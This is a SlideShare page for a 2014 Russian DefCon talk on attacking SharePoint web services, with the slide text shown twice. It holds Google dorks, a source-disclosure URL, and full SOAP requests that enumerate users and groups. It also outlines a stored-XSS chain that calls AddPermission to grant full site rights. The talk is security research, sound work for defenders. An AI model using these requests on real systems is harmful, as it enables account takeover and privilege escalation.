SlideShare a Scribd company logo

George Lagoda - Альтернативное использование вэб сервисов SharePoint со стороны информационной безопасности

DefconRussia, profile picture
DefconRussia

Документ рассматривает уязвимости веб-сервисов SharePoint и методы их использования для автоматизации атак и получения доступа к учетным записям пользователей. Описываются техники, такие как Google Hacking и использование SOAP-запросов для извлечения информации о пользователях и группах. Также приводятся примеры атак на основе XSS и управления правами доступа.

Education
1 of 25
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
AUG 30, 2014
АЛЬТЕРНАТИВНОЕ ИСПОЛЬЗОВАНИЕ ВЭБ СЕРВИСОВ SHAREPOINT СО СТОРОНЫ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ AUG 30, 2014 By George Lagoda
PENTESTER VULNERABILITY RESEARCHER BUG HUNTER WHITEHAT DEFCON MOSCOW FOUNDER George Lagoda 3
ЧТО ПРЕПАРИРУЕМ ? 4
ОСНОВНЫЕ КОМПОНЕНТЫ SHAREPOINT 5 ВЕБ-ПРИЛОЖЕНИЯ для организации совместной работы ФУНКЦИОНАЛЬНОСТЬ для создания веб-порталов ПОИСК ИНФОРМАЦИИ в документах и информационных системах УПРАВЛЕНИЕ РАБОЧИМИ ПРОЦЕССАМИ и содержимым масштаба предприятия БИЗНЕС-АНАЛИЗ
6 Google hacking ОБЩЕЕ ОПИСАНИЕ УЯЗВИМОСТЕЙ ЗАКРЫТЫЕ ДЕТАЛИ НЕБОЛЬШОЕ КОЛИЧЕСТВО ПУБЛИЧНЫХ ЭКСПЛОЙТОВ
УЯЗВИМОСТЬ ЗАГРУЗКИ ИСХОДНЫХ КОДОВ ASPX СТРАНИЦ 7 • Работает только в SharePoint 2007 • Необходимо знать адрес конкретной страницы • Основной интерес представляют страницы написанные разработчиками сайта h-p://www.example.com/_layouts/download.aspx?SourceUrl=/Pages/ Default.aspx&Source=h-p://www.example.com/Pages/ Default.aspx&FldUrl=
ВЕБ-СЕРВИСЫ SHAREPOINT 8 GOOGLE HACK : “INURL: _VTI_BIN/SPSDISCO.ASPX”
ТОНКИЙ МОМЕНТ /_vG_bin/ 9 /_vG_bin/
СТАРЫЙ СПОСОБ ПЕРЕЧИСЛЕНИЯ ПОЛЬЗОВАТЕЛЕЙ 10 HTTPS://HOST/_LAYOUTS/USERDISP.ASPX?ID=1
НЕДОСТАТКИ СТАРОГО СПОСОБА 11 • Необходимо инкрементировать ID • Не всегда есть доступ к просмотру • Можно попасть в группу • Самый большой ID не известен • NTLM или Kerberos авторизация при автоматизации • Парсинг данных при автоматизации • Что делать если их “over 9000”?????
ОТ ТЕОРИИ К ПРАКТИКЕ POST /sites/testsite1/_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetUserCollectionFromSite xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:Body> </soap:Envelope> 12
1133
8000+ пользователей одним запросом 1144
GREP “TEST” МНОГО ДОМЕНОВ, МНОГО ПОЛЬЗОВАТЕЛЕЙ, МНОГО ВОЗМОЖНОСТЕЙ 15
DUMMY BRUTE LEADS TO PWN • Захвачена тестовая доменная учетная запись • Повышена сложность обнаружения злоумышленника • Разные тестовые учетные записи могут содержать разные права доступа к сайту • Приведен пример из боевого проекта, получен аккаунт из домена крупного российского банка 16
DEER HUNTING Для поиска интересного аккаунта помимо тестового перечисляем список групп и узнаем в какой группе находится наша “жертва” 17
ПОЛУЧАЕМ СПИСОК ГРУПП POST /_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetGroupCollectionFromSite xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:Body> </soap:Envelope> 18 список групп на разных сайтах в рамках одного домена может различаться
1199
ИНТЕРЕСЕН ЛИ НАМ АККАУНТ? POST /_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetGroupCollectionFromUser xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/"> <userLoginName>SHAREPOINTsystem</userLoginName> </GetGroupCollectionFromUser> </soap:Body> </soap:Envelope> 20
2211
НАХОДИШЬ ХРАНИМЫЕ XSS НА ЛЮБОМ САЙТЕ? ИНТЕРЕСНО ЛИ КРАСТЬ АДМИНСКИЕ КУКИ? МОЖЕМ ЛИ МЫ ИХ УКРАСТЬ? ЗАЧЕМ КРАСТЬ СЕССИЮ АДМИНА, КОГДА МОЖНО СТАТЬ АДМИНОМ? 22
/_vti_bin/ Permissions.asmx Сайт + хранимая XSS + XHR с одним из этих методов + CORS нам не мешает = разрешения админа ) 23
ИГРАЕМ С РАЗРЕШЕНИЯМИ POST /_vti_bin/Permissions.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http:// schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <AddPermission xmlns="http://schemas.microsoft.com/sharepoint/soap/ directory/"> <objectName>testsite1</objectName> <objectType>web</objectType> <permissionIdentifier>i:0#.w|ra1d3ntest3</permissionIdentifier> <permissionType>User</permissionType> <permissionMask>-1</permissionMask> </AddPermission> </soap:Body> </soap:Envelope> 24
THAT’S ALL FOLKS ;] @rox41Id3n By George Lagoda

More Related Content

PPT
Positive Hack Days. Гуркин. Угрозы безопасности АСУ ТП
Positive Hack Days
 
PPTX
Безопасность Joomla: мифы и реальность
revisium
 
PDF
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
revisium
 
PDF
Этичный хакинг
Positive Hack Days
 
PDF
ХАРДЕНИНГ (Аринов Ильяс (determination))
Kristina Pomozova
 
PDF
The Atomic bomb for kiddies /exploring NSA exploits/
defcon_kz
 
PDF
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
defcon_kz
 
PDF
Linux for newbie hackers
defcon_kz
 
Positive Hack Days. Гуркин. Угрозы безопасности АСУ ТП
Positive Hack Days
 
Безопасность Joomla: мифы и реальность
revisium
 
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
revisium
 
Этичный хакинг
Positive Hack Days
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
Kristina Pomozova
 
The Atomic bomb for kiddies /exploring NSA exploits/
defcon_kz
 
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
defcon_kz
 
Linux for newbie hackers
defcon_kz
 

What's hot (20)

PDF
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Ontico
 
PDF
Безопасность сайта: мифы и реальность — Петр Волков
Yandex
 
PPTX
Под капотом Vulners
Kirill Ermakov
 
PDF
CodeFest 2012. Ивано и Пашук. — Интеграция корпоративных приложений. Пример в...
CodeFest
 
PPTX
Выступление Ревизиум на ХостОбзор 2017
revisium
 
PPTX
Целевые атаки: прицелься первым
Positive Hack Days
 
PDF
Настройки индексации сайта
Uplab_University
 
PPTX
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Expolink
 
PDF
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Positive Hack Days
 
PPT
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Expolink
 
PPT
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
PDF
Антон Карпов - Сетевая безопасность
Yandex
 
PPTX
#1 razvedka i sbor dannih
Uladzislau Murashka
 
PPT
Восток — дело тонкое, или Уязвимости медицинского и индустриального ПО
Positive Hack Days
 
PPTX
Safari
Katya Kosikova
 
PPTX
Безопасность вашего сайта Андрей Фуников
singree
 
PPTX
Что надо знать о HTTP/2 Frontend разработчику
Александр Майоров
 
PPTX
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
PDF
2013 09 21 безопасность веб-приложений
Yandex
 
PDF
После подключения DDoS-защиты: как "положат" Ваши ресурсы / Рамиль Хантимиров...
Ontico
 
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Ontico
 
Безопасность сайта: мифы и реальность — Петр Волков
Yandex
 
Под капотом Vulners
Kirill Ermakov
 
CodeFest 2012. Ивано и Пашук. — Интеграция корпоративных приложений. Пример в...
CodeFest
 
Выступление Ревизиум на ХостОбзор 2017
revisium
 
Целевые атаки: прицелься первым
Positive Hack Days
 
Настройки индексации сайта
Uplab_University
 
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Expolink
 
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Positive Hack Days
 
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Expolink
 
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
Антон Карпов - Сетевая безопасность
Yandex
 
#1 razvedka i sbor dannih
Uladzislau Murashka
 
Восток — дело тонкое, или Уязвимости медицинского и индустриального ПО
Positive Hack Days
 
Safari
Katya Kosikova
 
Безопасность вашего сайта Андрей Фуников
singree
 
Что надо знать о HTTP/2 Frontend разработчику
Александр Майоров
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
2013 09 21 безопасность веб-приложений
Yandex
 
После подключения DDoS-защиты: как "положат" Ваши ресурсы / Рамиль Хантимиров...
Ontico
 
Ad

Similar to George Lagoda - Альтернативное использование вэб сервисов SharePoint со стороны информационной безопасности (20)

PDF
7.2. Alternative sharepoint hacking
defconmoscow
 
PDF
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Yandex
 
PDF
11 лекция, петр волков
karina krew
 
PDF
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
OWASP Russia
 
PPT
Hivext 04.2010
Ruslan Synytsky
 
PPT
Hivext – облачная платформа для быстрой разработки интернет приложений
guest800050
 
PDF
НТБ. Сергей Шерстюк. "Система контроля привилегированных пользователей SafeI...
Expolink
 
PPTX
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей Safe...
Expolink
 
PPTX
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
Expolink
 
PPTX
Новые возможности развертывания и масштабирования open source приложений в Az...
Artur Baranok
 
PPTX
Пост-эксплуатация веб-приложений в тестах на проникновение
beched
 
PPSX
доктор веб медведев вячеслав год прошел как сон пустой или почему ничего не м...
Expolink
 
PPT
Тестирование мобильных приложений
Alexander Khozya
 
PPT
initiatives and instruments
Annie Rebel
 
PPTX
Каким будет SEO в начале 2017 года и как нам в этом поможет Wordpress?
Ruslan Begaliev
 
PPT
Penetration testing (AS IS)
Dmitry Evteev
 
PPT
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Expolink
 
PPTX
Open source technologies in Microsoft cloud - MS SWIT 2014
Alexey Bokov
 
PPT
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
Expolink
 
DOC
PT MIFI Labxss
Dmitry Evteev
 
7.2. Alternative sharepoint hacking
defconmoscow
 
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
Yandex
 
11 лекция, петр волков
karina krew
 
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
OWASP Russia
 
Hivext 04.2010
Ruslan Synytsky
 
Hivext – облачная платформа для быстрой разработки интернет приложений
guest800050
 
НТБ. Сергей Шерстюк. "Система контроля привилегированных пользователей SafeI...
Expolink
 
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей Safe...
Expolink
 
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
Expolink
 
Новые возможности развертывания и масштабирования open source приложений в Az...
Artur Baranok
 
Пост-эксплуатация веб-приложений в тестах на проникновение
beched
 
доктор веб медведев вячеслав год прошел как сон пустой или почему ничего не м...
Expolink
 
Тестирование мобильных приложений
Alexander Khozya
 
initiatives and instruments
Annie Rebel
 
Каким будет SEO в начале 2017 года и как нам в этом поможет Wordpress?
Ruslan Begaliev
 
Penetration testing (AS IS)
Dmitry Evteev
 
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Expolink
 
Open source technologies in Microsoft cloud - MS SWIT 2014
Alexey Bokov
 
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
Expolink
 
PT MIFI Labxss
Dmitry Evteev
 
Ad

More from DefconRussia (20)

PPTX
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
DefconRussia
 
PDF
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
DefconRussia
 
PPTX
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
DefconRussia
 
PDF
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
DefconRussia
 
PDF
Георгий Зайцев - Reversing golang
DefconRussia
 
PDF
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
DefconRussia
 
PPTX
Cisco IOS shellcode: All-in-one
DefconRussia
 
PPT
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
DefconRussia
 
PPTX
HTTP HOST header attacks
DefconRussia
 
PPTX
Attacks on tacacs - Алексей Тюрин
DefconRussia
 
PPTX
Weakpass - defcon russia 23
DefconRussia
 
PDF
nosymbols - defcon russia 20
DefconRussia
 
PDF
static - defcon russia 20
DefconRussia
 
PDF
Zn task - defcon russia 20
DefconRussia
 
PDF
Vm ware fuzzing - defcon russia 20
DefconRussia
 
PDF
Nedospasov defcon russia 23
DefconRussia
 
PDF
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
PDF
Miasm defcon russia 23
DefconRussia
 
PDF
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
DefconRussia
 
PDF
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
DefconRussia
 
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
DefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
DefconRussia
 
Георгий Зайцев - Reversing golang
DefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
DefconRussia
 
Cisco IOS shellcode: All-in-one
DefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
DefconRussia
 
HTTP HOST header attacks
DefconRussia
 
Attacks on tacacs - Алексей Тюрин
DefconRussia
 
Weakpass - defcon russia 23
DefconRussia
 
nosymbols - defcon russia 20
DefconRussia
 
static - defcon russia 20
DefconRussia
 
Zn task - defcon russia 20
DefconRussia
 
Vm ware fuzzing - defcon russia 20
DefconRussia
 
Nedospasov defcon russia 23
DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
Miasm defcon russia 23
DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
DefconRussia
 

George Lagoda - Альтернативное использование вэб сервисов SharePoint со стороны информационной безопасности

  • 2. АЛЬТЕРНАТИВНОЕ ИСПОЛЬЗОВАНИЕ ВЭБ СЕРВИСОВ SHAREPOINT СО СТОРОНЫ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ AUG 30, 2014 By George Lagoda
  • 3. PENTESTER VULNERABILITY RESEARCHER BUG HUNTER WHITEHAT DEFCON MOSCOW FOUNDER George Lagoda 3
  • 5. ОСНОВНЫЕ КОМПОНЕНТЫ SHAREPOINT 5 ВЕБ-ПРИЛОЖЕНИЯ для организации совместной работы ФУНКЦИОНАЛЬНОСТЬ для создания веб-порталов ПОИСК ИНФОРМАЦИИ в документах и информационных системах УПРАВЛЕНИЕ РАБОЧИМИ ПРОЦЕССАМИ и содержимым масштаба предприятия БИЗНЕС-АНАЛИЗ
  • 6. 6 Google hacking ОБЩЕЕ ОПИСАНИЕ УЯЗВИМОСТЕЙ ЗАКРЫТЫЕ ДЕТАЛИ НЕБОЛЬШОЕ КОЛИЧЕСТВО ПУБЛИЧНЫХ ЭКСПЛОЙТОВ
  • 7. УЯЗВИМОСТЬ ЗАГРУЗКИ ИСХОДНЫХ КОДОВ ASPX СТРАНИЦ 7 • Работает только в SharePoint 2007 • Необходимо знать адрес конкретной страницы • Основной интерес представляют страницы написанные разработчиками сайта h-p://www.example.com/_layouts/download.aspx?SourceUrl=/Pages/ Default.aspx&amp;Source=h-p://www.example.com/Pages/ Default.aspx&amp;FldUrl=
  • 8. ВЕБ-СЕРВИСЫ SHAREPOINT 8 GOOGLE HACK : “INURL: _VTI_BIN/SPSDISCO.ASPX”
  • 10. СТАРЫЙ СПОСОБ ПЕРЕЧИСЛЕНИЯ ПОЛЬЗОВАТЕЛЕЙ 10 HTTPS://HOST/_LAYOUTS/USERDISP.ASPX?ID=1
  • 11. НЕДОСТАТКИ СТАРОГО СПОСОБА 11 • Необходимо инкрементировать ID • Не всегда есть доступ к просмотру • Можно попасть в группу • Самый большой ID не известен • NTLM или Kerberos авторизация при автоматизации • Парсинг данных при автоматизации • Что делать если их “over 9000”?????
  • 12. ОТ ТЕОРИИ К ПРАКТИКЕ POST /sites/testsite1/_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetUserCollectionFromSite xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:Body> </soap:Envelope> 12
  • 13. 1133
  • 15. GREP “TEST” МНОГО ДОМЕНОВ, МНОГО ПОЛЬЗОВАТЕЛЕЙ, МНОГО ВОЗМОЖНОСТЕЙ 15
  • 16. DUMMY BRUTE LEADS TO PWN • Захвачена тестовая доменная учетная запись • Повышена сложность обнаружения злоумышленника • Разные тестовые учетные записи могут содержать разные права доступа к сайту • Приведен пример из боевого проекта, получен аккаунт из домена крупного российского банка 16
  • 17. DEER HUNTING Для поиска интересного аккаунта помимо тестового перечисляем список групп и узнаем в какой группе находится наша “жертва” 17
  • 18. ПОЛУЧАЕМ СПИСОК ГРУПП POST /_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetGroupCollectionFromSite xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:Body> </soap:Envelope> 18 список групп на разных сайтах в рамках одного домена может различаться
  • 19. 1199
  • 20. ИНТЕРЕСЕН ЛИ НАМ АККАУНТ? POST /_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetGroupCollectionFromUser xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/"> <userLoginName>SHAREPOINTsystem</userLoginName> </GetGroupCollectionFromUser> </soap:Body> </soap:Envelope> 20
  • 21. 2211
  • 22. НАХОДИШЬ ХРАНИМЫЕ XSS НА ЛЮБОМ САЙТЕ? ИНТЕРЕСНО ЛИ КРАСТЬ АДМИНСКИЕ КУКИ? МОЖЕМ ЛИ МЫ ИХ УКРАСТЬ? ЗАЧЕМ КРАСТЬ СЕССИЮ АДМИНА, КОГДА МОЖНО СТАТЬ АДМИНОМ? 22
  • 23. /_vti_bin/ Permissions.asmx Сайт + хранимая XSS + XHR с одним из этих методов + CORS нам не мешает = разрешения админа ) 23
  • 24. ИГРАЕМ С РАЗРЕШЕНИЯМИ POST /_vti_bin/Permissions.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http:// schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <AddPermission xmlns="http://schemas.microsoft.com/sharepoint/soap/ directory/"> <objectName>testsite1</objectName> <objectType>web</objectType> <permissionIdentifier>i:0#.w|ra1d3ntest3</permissionIdentifier> <permissionType>User</permissionType> <permissionMask>-1</permissionMask> </AddPermission> </soap:Body> </soap:Envelope> 24
  • 25. THAT’S ALL FOLKS ;] @rox41Id3n By George Lagoda